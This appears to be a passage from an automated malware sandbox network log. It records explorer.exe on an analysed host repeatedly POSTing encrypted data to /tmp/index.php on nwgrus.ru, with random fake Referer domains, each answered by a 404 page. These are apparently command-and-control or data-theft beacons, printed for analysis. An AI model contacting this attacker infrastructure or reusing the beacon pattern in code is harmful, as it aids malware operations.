Oct 14, 2024 01:52:57.098568916 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:52:56 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49763	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:52:57.114233971 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hbtkpieyfdv.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 330 Host: nwgrus.ru
Oct 14, 2024 01:52:57.114264011 CEST	330	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 79 4a bc e8 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vuyJ]kqZDGbt9(lZUA?rR:#MC@QysI. =K=}["wkl{)7f.S7
Oct 14, 2024 01:52:58.208302975 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:52:58 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49766	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:52:58.217596054 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nannolqtxvdvgf.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 172 Host: nwgrus.ru
Oct 14, 2024 01:52:58.217612028 CEST	172	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 40 2d a7 96 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vu@-j;[`nfD>34^hP}T_#UH};:R$qj}?
Oct 14, 2024 01:52:59.308052063 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:52:59 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49772	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:52:59.318584919 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pjnfdjwducxdwna.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 316 Host: nwgrus.ru
Oct 14, 2024 01:52:59.318584919 CEST	316	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 73 5d ce 85 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vus]rUB;[rX$~"*iIY[B!6)VT(T."\2Y_D!`7~SE=d}O6jmn%.<
Oct 14, 2024 01:53:00.410244942 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:53:00 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49783	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:53:00.418123960 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bvawnwiwcpmgflx.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 124 Host: nwgrus.ru
Oct 14, 2024 01:53:00.418123960 CEST	124	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 77 04 d6 f5 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vuw&ynp\|I5-p*Dy
Oct 14, 2024 01:53:01.541305065 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:53:01 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49789	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:53:01.549936056 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yocwufliskskpcvu.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 338 Host: nwgrus.ru
Oct 14, 2024 01:53:01.549978018 CEST	338	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 38 3c ea ac Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vu8<aHPMHTC~e.H\|PJu/+:Q`{RT=%nP[U VxN]s&tZ'CW+d4?&
Oct 14, 2024 01:53:02.669269085 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:53:02 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49797	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:53:02.678565979 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bfjqfyqpqtyfp.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 222 Host: nwgrus.ru
Oct 14, 2024 01:53:02.678565979 CEST	222	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 15 6b 2c 90 f5 76 0b 75 4d 22 ad e4 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vuM"2maoqPqAQ4=rA'~R`&k4/#k-l @yqIMwU?:,6x{5
Oct 14, 2024 01:53:03.768182993 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:53:03 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49806	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:53:03.778011084 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xknbcflanypqj.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 273 Host: nwgrus.ru
Oct 14, 2024 01:53:03.778024912 CEST	273	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 2a 6b 2c 90 f5 76 0b 75 57 41 d7 a2 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[*k,vuWAhPoX}j'z5_2[+KZiB+tPdv!a0<{)@@\1GkM\|O1]h`<a?B
Oct 14, 2024 01:53:04.904217958 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:53:04 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49812	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:53:04.992335081 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fgbayjdhmimo.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 156 Host: nwgrus.ru
Oct 14, 2024 01:53:04.992361069 CEST	156	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 2b 6b 2c 90 f5 76 0b 75 56 2a b5 a0 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[+k,vuV*j}vxPF_PoHJ>vV<\UI/JTLb<K<
Oct 14, 2024 01:53:06.098270893 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:53:05 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	50037	58.151.148.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:54:15.511869907 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ecwlvrprlkc.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 204 Host: nwgrus.ru
Oct 14, 2024 01:54:15.511869907 CEST	204	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3d 4b b3 f0 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA .[k,vu=K#xb\|Dg0KnX{H({\|`+_@g :1PIR_d}i%R"^+$w9IV
